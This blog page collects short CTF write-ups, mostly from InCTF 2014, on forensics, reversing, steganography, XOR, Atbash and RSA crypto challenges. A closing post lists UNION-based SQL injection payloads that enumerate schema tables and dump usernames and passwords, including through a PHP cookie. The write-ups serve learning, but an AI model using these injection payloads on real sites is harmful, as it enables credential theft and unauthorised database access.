Posts

Showing posts with the label CTF

InCTF 2014 - Forensics-8 300

We are given a partition image that needs to be mounted to get the flag.

    root@Vijay:~/Desktop/inctf 14/forensics# file Forensics-8
    Forensics-8: x86 boot sector; partition 1: ID=0xc, starthead 0, startsector 1, 97656 sectors, code offset 0xb8
    root@Vijay:~/Desktop/inctf 14/forensics#
    root@Vijay:~/Desktop/inctf 14/forensics#
    root@Vijay:~/Desktop/inctf 14/forensics#
    root@Vijay:~/Desktop/inctf 14/forensics# gparted Forensics-8
    ======================
    libparted : 2.3
    ======================
    root@Vijay:~/Desktop/inctf 14/forensics# parted Forensics-8
    GNU Parted 2.3
    Using /root/Desktop/inctf 14/forensics/Forensics-8
    Welcome to GNU Parted! Type 'help' to view a list of commands.
    (parted) unit
    Unit?  [compact]? B                       ...

InCTF 2014 - Reverse 50

1. The first challenge was a compiled Python file. I used a Python decompiler to get the original code.

    root@Vijay:~/Desktop/inctf 14/reverse# file one
    one: python 2.7 byte-compiled

I got the printable sequence array values.

    eflag = [131,
    ... 138,
    ... 219,
    ... 198,
    ... 201,
    ... 158,
    ... 151,
    ... 154,
    ... 134,
    ... 129,
    ... 128,
    ... 177,
    ... 135,
    ... 157,
    ... 177,
    ... 157,
    ... 154,
    ... 135,
    ... 130,
    ... 130,
    ... 177,
    ... 141,
    ... 129,
    ... 129,
    ... 130,
    ... 201,
    ... 199]
    >>> eflag
    [131, 138, 219, 198, 201, 158, 151, 154, 134, 129, 128, 177, 135, 157, 177, 157, 154, 135, 130, 130, 177, 141, 129, 129, 130, 201, 199]
    >>>
    >>> flag = ''.join(map(chr, map(lambda x: x ^ 238, eflag)))
    >>>
    >>> print flag
    md5('python_is_still_cool')

Next is the compiled Java class file; I used the jad decompiler to get the original class file.

    root@Vijay:~/Desktop/inctf 14/reverse# file two.class
    two.class: compiled Java...

InCTF 2014 - Reverse 100

Hi, this is my first reverse engineering with GDB. The challenge was to get the flag from the display_function. First we should disassemble the executable file with objdump to see how the program control works.

    root@Vijay:~/Desktop/inctf 14/reverse# objdump -d four

    four: file format elf32-i386

    Disassembly of section .init:

    080482f4 :
     80482f4: 53                   push %ebx
     80482f5: 83 ec 08             sub $0x8,%esp
     80482f8: e8 b3 00 00 00       call 80483b0
     80482fd: 81 c3 03 1d 00 00    add $0x1d03,%ebx
     8048303: 8b 83 fc ff ff ff    mov -0x4(%ebx),%eax
     8048309: 85 c0                test %eax,%eax
     804830b: 74 05                je 8048312
     804830d: e8 3e 00 00 00       call 8048350
     8048312: 83 c4 08             add $0x8,%esp
     8048315: 5b                   pop %ebx
     8048316: c3                   ret

    Disassembly of section .plt:

    08048320 :
     8048320: ff 35 04 a0 04 08    pushl 0x804a004
     8048326: ff 25 08 a0 04 08    jmp ...

InCTF 2014 - Stegnography 400

Given an image, the flag is hidden in the blue plane.

    import os,sys
    from PIL import Image

    modi_bin = Image.open("modi.png").convert('RGB')
    bin = ''
    R = open('r.txt','w')
    G = open('g.txt','w')
    B = open('b.txt','w')
    # By analysing the text docs I found the blue plane's first column is embedded with data
    flag = ''
    flag1 = ''
    for h in range(modi_bin.size[1]): # Fetches Height
        count = 0
        binR = ''
        binG = ''
        binB = ''
        for w in range(modi_bin.size[0]): # Fetches Width
            count += 1
            binR += str(modi_bin.getpixel((w,h))[0] & 1)
            binG += str(modi_bin.getpixel((w,h))[1] & 1)
            binB += str(modi_bin.getpixel((w,h))[2] & 1)
            if w == 0: # blue plane first bit
                flag += str(modi_bin.getpixel((w,h))[2] & 1)
            if count == 8:
                R.write(binR)
                G.write(binG)
                B.write(binB)
                binR=' ';binG=' ';binB=' '
                count = 0
        R.write(binR+'\n')
        G....

InCTF 2014 - Crypto 300

This is also an RSA challenge, and a more interesting one: we are given an RSA-704 bit key. The factors are found in the wiki. I used openssl to finish this challenge.

    root@Vijay:# openssl rsa -inform PEM -text -pubin -in publickey.pem -modulus
    Public-Key: (704 bit)
    Modulus:
        00:e1:34:18:93:fe:6e:68:16:ce:c8:a9:70:a3:9c:
        00:fa:54:7c:7d:a2:cd:ed:ab:0a:62:b9:1c:46:51:
        a8:3f:96:38:0b:cf:ae:e2:6f:7e:86:61:07:90:63:
        89:42:1b:1e:68:d0:a1:7a:ad:c9:87:0b:98:58:e9:
        56:28:6e:39:99:e9:8c:ec:98:81:53:4a:c7:72:ae:
        78:f5:e8:ab:a1:e2:f8:d3:03:95:77:02:9d:87
    Exponent: 65537 (0x10001)
    Modulus=E1341893FE6E6816CEC8A970A39C00FA547C7DA2CDEDAB0A62B91C4651A83F96380BCFAEE26F7E866107906389421B1E68D0A17AADC9870B9858E956286E3999E98CEC9881534AC772AE78F5E8ABA1E2F8D3039577029D87
    writing RSA key
    -----BEGIN PUBLIC KEY-----
    MHQwDQYJKoZIhvcNAQEBBQADYwAwYAJZAOE0GJP+bmgWzsipcKOcAPpUfH2ize2r
    CmK5HEZRqD+WOAvPruJvfoZhB5BjiUIbHmjQoXqtyYcLmFjpVihuOZnpjOyYgVNK
    x3KuePXoq6Hi+NMDlXcCnYcCAwEAAQ==
    -----END PUBLIC KEY-...

InCTF 2014 - Crypto 200

This challenge made me mad, but somehow I finally managed to solve it. This is an RSA crypto challenge: we are given a cipher and a public key. This is the RSA low public exponent attack, e=3.

    root@Vijay:# openssl rsa -pubin -in pub.pem -text -noout -modulus
    Public-Key: (4096 bit)
    Modulus:
        00:d1:0b:a0:e9:cd:6d:d6:c3:89:5f:cd:f4:17:db:
        21:e5:81:22:60:89:c6:c7:58:7f:c4:1b:3d:78:df:
        f5:2c:0f:8c:29:dc:6b:e9:fc:cf:31:68:32:e6:ff:
        6f:f0:49:6e:9e:56:6e:cb:c1:31:06:4e:b8:47:5d:
        6c:1b:c8:28:be:4a:f4:54:ad:62:cb:f0:d1:d2:cd:
        5a:59:8a:24:1c:52:b1:6d:8e:e1:da:0c:a9:cc:56:
        30:3c:d0:70:71:0e:6c:18:1f:2a:31:c6:88:7e:52:
        cf:14:bd:76:f6:25:80:a8:46:92:f8:81:98:a9:38:
        49:0f:b2:de:19:41:b1:10:85:83:3d:ed:ca:16:67:
        3f:4a:e5:4b:e6:0f:e0:da:66:24:a5:3d:b2:32:dc:
        a6:c5:88:7d:72:3c:77:39:c4:76:ef:30:60:19:a0:
        57:f1:c6:be:37:a5:b8:20:d0:91:9a:cf:fd:18:63:
        d2:2c:6f:a7:30:fe:12:e8:15:35:9d:68:a4:ec:e1:
        c0:1e:f7:b0:ec:d9:59:91:b3:d9:71:d0:09:27:99:
        5e:d6:6e:d...

InCTF 2014 - Crypto 100

There are three files: one.txt, one.txt.enc and second.txt.enc. The challenge is to decrypt second.txt.enc using the key. We have a message and its cipher, which hints that the operation was done using XOR. So XORing (Message ^ Cipher) = Key.

    #!/usr/bin/env python
    import hashlib

    """
    one.txt
    This sentence is encrypted using XOR cipher.
    """
    plain_text = open('one.txt','r').read().strip()

    """
    one.txt.enc
    LAcbGEUKHQEGDgsaHU8bGEUcFgwAEhUNHQtSHhYQFghSMyorWAwbGw0cCkE=
    """
    cipher_text = open('one.txt.enc','r').read().decode("base64")

    print plain_text
    print '---------------------------------------------------------------------'
    print cipher_text
    print '---------------------------------------------------------------------'

    plain_text = [ord(i) for i in plain_text]
    cipher_text = [ord(i) for i in cipher_text]

    key = ''
    for i in range(len(plain_text)):
        c = ((plain...
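The key recovery described above, as an added example (Python 3, not the post's own script): it XORs the plaintext and ciphertext quoted in the post, then reduces the keystream to its shortest repeating unit. The second message is constructed here, since the contents of second.txt.enc are not shown in the post.

```python
import base64
from itertools import cycle

# Values quoted in the post above.
PLAIN = b"This sentence is encrypted using XOR cipher."
CIPHER_B64 = "LAcbGEUKHQEGDgsaHU8bGEUcFgwAEhUNHQtSHhYQFghSMyorWAwbGw0cCkE="


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def recover_keystream(plain: bytes, cipher: bytes) -> bytes:
    """Known plaintext: keystream[i] = plain[i] ^ cipher[i]."""
    if len(plain) != len(cipher):
        raise ValueError("plaintext and ciphertext lengths differ")
    return bytes(p ^ c for p, c in zip(plain, cipher))


def shortest_period(stream: bytes) -> bytes:
    """Return the shortest prefix whose repetition reproduces the stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def recover_key() -> bytes:
    """Recover the repeating key from the pair quoted in the post."""
    cipher = base64.b64decode(CIPHER_B64)
    return shortest_period(recover_keystream(PLAIN, cipher))


if __name__ == "__main__":
    key = recover_key()
    print("recovered key:", key)
    # Constructed stand-in for the second ciphertext (not from the post).
    second = xor_bytes(b"constructed second message", key)
    print("decrypted:", xor_bytes(second, key))
```

Because one known plaintext/ciphertext pair exposes the whole key, a repeating-key XOR scheme gives no confidentiality to any other message encrypted under the same key.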

InCTF 2014 - Crypto 50

Question: Zgyzhsxrksvi dzh lirtrmzoob wvevolkvw uli gsv Svyivd ozmtfztv. Gsv pvb uli gsrh ovevo rh svyivd.

Given Hint: The Atbash cipher is a very common, simple cipher. It was for the Hebrew alphabet, but modified here to work with the English alphabet. Basically, when encoded, an "A" becomes a "Z", "B" turns into "Y", etc. The Atbash cipher can be implemented as an Affine cipher by setting both "a" and "b" to 25.

We used the online tool http://rumkin.com/tools/cipher/atbash.php to decrypt the encoded message.

This is your encoded/decoded text: Atbash cipher was originally developed for the Hebrew language. The key for this level is hebrew.
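The hint's claim that Atbash is the affine cipher with a = b = 25 can be checked directly. This added example (not part of the original post) implements the general affine map, decodes the challenge text with it, and compares the result against a plain letter-mirroring table; the function names are chosen here for illustration.

```python
import string
from math import gcd

# Ciphertext quoted in the challenge above.
QUESTION = ("Zgyzhsxrksvi dzh lirtrmzoob wvevolkvw uli gsv Svyivd "
            "ozmtfztv. Gsv pvb uli gsrh ovevo rh svyivd.")

# Direct Atbash: a<->z, b<->y, ... with case preserved.
ATBASH_TABLE = str.maketrans(
    string.ascii_letters,
    string.ascii_lowercase[::-1] + string.ascii_uppercase[::-1],
)


def affine(text: str, a: int, b: int) -> str:
    """Apply E(x) = (a*x + b) mod 26 to ASCII letters, preserving case."""
    if gcd(a, 26) != 1:
        raise ValueError("a must be coprime with 26 to be invertible")
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((a * (ord(ch) - base) + b) % 26 + base))
        else:
            out.append(ch)  # spaces and punctuation pass through
    return "".join(out)


def affine_decrypt(text: str, a: int, b: int) -> str:
    """D(y) = a^-1 * (y - b) mod 26, which is again an affine map."""
    a_inv = pow(a, -1, 26)  # modular inverse, Python 3.8+
    return affine(text, a_inv, (-a_inv * b) % 26)


def decode_question() -> str:
    """Decode the challenge text using the affine form with a = b = 25."""
    return affine(QUESTION, 25, 25)


if __name__ == "__main__":
    print(decode_question())
    # 25 is its own inverse mod 26, so encrypting and decrypting coincide.
    print(affine_decrypt(QUESTION, 25, 25) == decode_question())
```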

Nullcon HackIM 2014 - Programming 100 Writeup

    '''
    Well I am a beginner.

    netcat 23.23.190.204 2002
    Welcome
    Enter 20 spam words to authenticate yourself.
    01/20: spam
    02/20: maps
    03/20: hot
    Authenticate failed. hot(125) is not a palprime.

    (Hint) Tried with different test cases and found the value for each alphabet.
    Since in the challenge only lower-case should be used (condition),
    I wrote a big program (once again, I am a beginner) to find the palprime words available in the dictionary.
    For the word list I downloaded the dataset from infochimps.com

    Thank you !!!
    '''
    #!/usr/bin/python
    import string
    import sys,math
    import random

    my_dict ={}
    a =1
    s = 361
    t = 762 - s - a
    n = 196
    b = 405 - a -t
    c = 410 - a - t
    d =213 - a - n
    e = 426 - a -t
    f = 437 -a -t
    g = 306 - 1 -256
    i = 442 - s
    h = 506 - i - s
    j = 525 - e -t
    k = 627 -i -t -e
    l = 738 -i -g -h -t
    p = 256
    m = 169
    o = 274 - g
    u = 833 - 2*n
    q = 1211 - u -i -t
    r = 918 -i -g -h -t
    v = 885 -a -t
    w = 651 -i -d -e
    x = 962 -e -s
    y = 1587 -e -s -x
    z = 103...

rivest-shamir-adleman-250 writeup (Zeromutarts.de 2013)

    ## using SAGE RSA
    n = 80646413
    p = floor(sqrt(80646413))
    ### Finding Factor p*q = n
    while(true):
        if (n%p == 0):
            print p
            break
        p=p+1
    q = n / p
    print q
    #### phi(n)
    n1 = (p-1) * (q-1)
    print n1
    e =5
    d = e^-1 % n1
    print d
    ### got private key
    ### Fast Exponentiation Algorithms
    def expo(c,d,n):
        if (d==1):
            return c%n
        if (d==2):
            return c*c % n
        if (d%2==0):
            return expo(expo(c,d/2,n),2,n)
        else:
            # reduce mod n here too, so the odd-exponent case stays below n
            return c*expo(expo(c,(d-1)/2,n),2,n) % n
    cipher = [72895864,15633602,38820479,60303684,7458706,60299530,20682371,54642689,26066811,32615038,35349196,76400140,38820479,56463813,80491201,76400140,35349196,69567074,26066811,76400140,74270178,76127647,76127647,15633602,76400140,60303684,38820479,56463813,60303684,76400140,72844764,76127647,69302434,15633602,80491201,76400140,6809712,26066811,76400140,42498798,60299530,76127647,69302434,80491201,33234011]
    flag = ''
    for c in cipher:
        flag = flag+ chr(ex...

SQL injection My First Try

    id=4 UNION ALL SELECT 1,2,3
    id=4 UNION ALL SELECT 1,table_name,3 from information_schema.tables
    id=4 UNION ALL SELECT 1,column_name,3 from information_schema.columns
    id=4 UNION ALL SELECT 1,username,password from users

Another is by COOKIES in PHP

    <query> = '$username'
    ' UNION ALL SELECT 1,2;#
    ' UNION ALL SELECT table_name,3 from information_schema.tables;#
    ' UNION ALL SELECT column_name,1 from information_schema.columns;#
    ' UNION ALL SELECT login, password from users;#

BASE64 converter: http://www.base64decode.org/

TAMPER DATA in the Mozilla browser to inject it